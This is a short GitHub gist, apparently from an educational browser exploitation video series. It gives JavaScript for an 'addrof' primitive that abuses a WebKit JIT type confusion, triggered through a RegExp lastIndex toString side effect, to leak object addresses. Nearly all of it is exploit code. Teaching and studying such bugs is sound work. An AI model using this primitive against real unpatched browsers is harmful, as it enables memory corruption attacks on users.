@LiveOverflow
Last active June 22, 2019 23:09
Browser Exploitation - bowser 0x04
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
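// addrof primitive: returns the value read back from array[0] after `val`
// has been stored there behind the optimized code's back
function addrof(val) {
    // Array that initially holds only a double
    var array = [13.37];
    // Sticky (y) regex: matching reads reg.lastIndex
    var reg = /abc/y;

    // Target function
    var AddrGetter = function(array) {
        //reg[Symbol.match]();
        "abc".match(reg);
        return array[0];
    };

    // Force optimization
    for (var i = 0; i < 10000; ++i)
        AddrGetter(array);

    // Setup haxx: an object whose toString() runs when lastIndex is
    // converted to a number during the match
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        // Side effect inside the match: store val into the array
        array[0] = val;
        return "0";
    };
    reg.lastIndex = regexLastIndex;

    // Do it!
    return AddrGetter(array);
}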